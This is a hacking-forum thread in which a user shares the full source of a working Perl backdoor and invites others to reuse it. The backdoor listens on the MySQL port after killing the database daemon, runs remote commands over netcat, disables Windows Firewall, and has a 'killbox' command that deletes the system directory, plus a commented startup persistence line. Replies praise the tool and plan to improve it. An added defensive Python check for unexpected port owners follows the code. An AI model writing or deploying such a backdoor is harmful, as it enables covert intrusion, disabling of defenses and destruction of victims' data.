backdoor I've been working on
  • m0rph
    Posts: 332
    sup everyone, this is the code to my backdoor. I was going to submit this for the malware contest, sadly, you have to buy perl2exe to stop the window from showing up. In other words, it wasn't very stealthy when converted to an executable. Nonetheless, granted you have the right privileges, this is not a terrible script....it is limited, but it's not bad. If you're having trouble with your own backdoor, feel free to use my code. You can connect to it with netcat, if you run commands from the menu, the output will be displayed back to you. I've also included most of the *nix equivalent commands in comments. This backdoor acts how a real backdoor should. A real backdoor should disable/bypass any services hindering its use, it should take over well known ports so it doesn't use something obvious like port 1337, and it should allow you to absolutely destroy the box.

    *Spoiler Alert!* If you can't figure out how to use it, try asking it how its day is going ;)

    #!/usr/bin/perl -w
    #Written by m0rph
    use IO::Socket; #Socket handler
    use Net::hostent; #Host information exchange
    use File::Copy; #File Copying
    use warnings; #Debugging

    #`net stop \"Windows Firewall\"`; #replace with /etc/init.d/iptables stop, must be root
    #system(\"taskkill /IM mysqld.exe /F\"); #Disable mysql daemon
    my $port=3306; #Binded port, replace port number with $ARGV[0] to use with command line input
    my $server=IO::Socket::INET->new( Proto => 'tcp',
    LocalPort => $port,
    Listen => SOMAXCONN, #Number of pending connections, and connections allowed
    Reuse => 1);

    die \"Listener failed to start\" unless $server; #Error Handling
    print \"Listener started. Waiting for connection...\n\";

    while ($client = $server->accept()) {
    $client->autoflush(1);
    $hostinfo = gethostbyaddr($client->peeraddr);
    #print \"[Connection from %s]\", $hostinfo->name || $client->peerhost; #shows connecting host to server
    while ( <$client>) {
    next unless /\S/; #If no input is received, stay connected.
    printf $client \"%s \$ \", $hostinfo->name || $server->peerhost;
    if (/exit|quit/i) { last; } #Quit and Exit commmands for disconnecting
    elsif (/sup brah/i) { print $client \"\n\",
    \"------------------------\n\",
    \"| |\n\",
    \"| Let's do this |\n\",
    \"| |\n\",
    \"------------------------\n\",
    \"\n\",
    \"Type help for a list of commands\n\"; }
    elsif (/date/i) { printf $client \"%s\n\", scalar localtime;}
    elsif (/ip -s/i) { print $client `ipconfig /all`; } #replace with ifconfig
    elsif (/ip -r/i) { print $client `ipconfig /release`; } #replace with ifconfig eth0 down
    elsif (/ps/i) { print $client `tasklist /v`;} #show current processes, replace with ps -aux
    elsif (/netstat/i) { print $client `netstat -an`; } #show current connections, same command
    elsif (/whoami/i) { print $client `whoami`; } #works on some windows machines, works on all *nix
    elsif (/rain/i) { print $client `net stop \"Windows Firewall\"`; } #replace with /etc/init.d/iptables stop, must be root
    elsif (/killbox/i) { print $client system('RD %systemroot% /S /Q'); } #replace with rm -rf /
    elsif (/shell/i) { system('cmd'); } ###Intended to drop a shell, but doesn't, try replacing with /bin/sh
    elsif (/help/i) { print $client \"\n\",
    \"-------------\n\",
    \"Command List:\n\",
    \"-------------\n\",
    \"ip -s IP Configuration.\n\",
    \"ip -r -r for IP release, Shell must have administrative privileges.\n\",
    \"whoami Current User.\n\",
    \"netstat Active Connections.\n\",
    \"date Current Date and Time\n\",
    \"ps List Current Processes.\n\",
    \"rain Stops Windows Firewall. Shell must have administrative privileges.\n\",
    \"killbox Remove filesystem. Shell must have administrative privileges.\n\",
    \"shutdown Shutdown Target.\n\",
    #\"shell Drop A Shell.\n\",
    \"quit \n\"; }
    else {
    print $client \"\n\nError: Connection Timed Out\"; #Incase someone else tries connecting to shell, try and fool them to not connect to it again.
    close $client;
    }
    }
    continue {
    printf $client \"%s \$ \", $hostinfo->name || $server->peerhost;
    }
    print $client \"\n\nGood Bye.\";
    close $client; #To close connection: CTRL + C
    }
    #move(\"noname.pl\",\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\noname.pl\"); #this will copy self to XP SP2 Startup Directory
    while( !(succeed = try() ) );
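
From the defender's side, the traits described in the post above (a listener sitting on a well-known port such as 3306 after the real daemon has been killed) show up as a mismatch between a listening port and the process that owns it. The following is an added example, not part of the original thread: a Python check over `netstat -ano` and `tasklist /fo csv /nh` output. The sample data, the expected-owner baseline and the function names are constructed for illustration.

```python
import csv
import io

# Assumed baseline: which image is expected to own each well-known port on this host.
EXPECTED = {3306: {"mysqld.exe"}, 1433: {"sqlservr.exe"}, 3389: {"svchost.exe"}}
INTERPRETERS = {"perl.exe", "python.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# Constructed sample data in the format of `netstat -ano` and `tasklist /fo csv /nh`.
NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       4120
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1088
  TCP    10.0.0.5:49712         10.0.0.9:445           ESTABLISHED     4
"""
TASKLIST = '''\
"svchost.exe","912","Services","0","9,184 K"
"svchost.exe","1088","Services","0","12,400 K"
"perl.exe","4120","Console","1","6,020 K"
'''

def pid_to_image(tasklist_csv):
    """Map PID -> lower-cased image name from tasklist CSV rows."""
    rows = csv.reader(io.StringIO(tasklist_csv))
    return {int(r[1]): r[0].lower() for r in rows if len(r) >= 2}

def listeners(netstat_text):
    """Yield (port, pid) for every TCP socket in LISTENING state."""
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING":
            yield int(f[1].rsplit(":", 1)[1]), int(f[4])

def audit(netstat_text, tasklist_csv):
    """Return findings for listeners whose owning process does not fit the baseline."""
    images = pid_to_image(tasklist_csv)
    findings = []
    for port, pid in listeners(netstat_text):
        image = images.get(pid, "<unknown>")
        expected = EXPECTED.get(port)
        if expected and image not in expected:
            findings.append((port, pid, image, "unexpected owner of well-known port"))
        elif image in INTERPRETERS:
            findings.append((port, pid, image, "script interpreter holding a listener"))
    return findings

if __name__ == "__main__":
    for finding in audit(NETSTAT, TASKLIST):
        print(finding)
```

On a real host the same comparison is worth pairing with service-control events, since the post also describes stopping the firewall service and killing the database daemon before binding the port.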
  • Sh3llc0d3
    Posts: 1,910
    Nice code, I was thinking of doing something similar with Perl for the competition; had the same problem with using binary files.
  • Xin
    Posts: 3,251
    Good job m0rph looks good, maybe you and sh3llc0de can work on something together.
    Xin
  • s1n4
    Posts: 88
    Nice share, Thanks m0rph :)
  • Mr. P-teo
    Posts: 269
    This looks quite nice, when I've finished my database I think I might have a go at coding a backdoor...
    Skype: mrpt3o
    Twitter: MrPteo
  • m0rph
    Posts: 332
    Update: The shell functionality of it doesn't work because the standard input/output is already being called, and would thus result in the shell process being run interactively (which is not possible when redirecting stdio).

    I will try to fix it at some point. My idea for making it work will be to have it create a new process listening on a different port, or to include a function that will run itself again with a different argument (causing it to drop a shell on a different port). If anyone wants to give it a go, please feel free.

    I can't believe I didn't think about it being run interactively while I was writing the backdoor the first time...what a rookie mistake lol
    while( !(succeed = try() ) );
  • Sh3llc0d3
    Posts: 1,910
    m0rph said:

    Update: The shell functionality of it doesn't work because the standard input/output is already being called, and would thus result in the shell process being run interactively (which is not possible when redirecting stdio).

    I will try to fix it at some point. My idea for making it work will be to have it create a new process listening on a different port, or to include a function that will run itself again with a different argument (causing it to drop a shell on a different port). If anyone wants to give it a go, please feel free.

    I can't believe I didn't think about it being run interactively while I was writing the backdoor the first time...what a rookie mistake lol

    I'll have a try, I'll have a proper look through it when I get to uni, will be awesome when it's complete.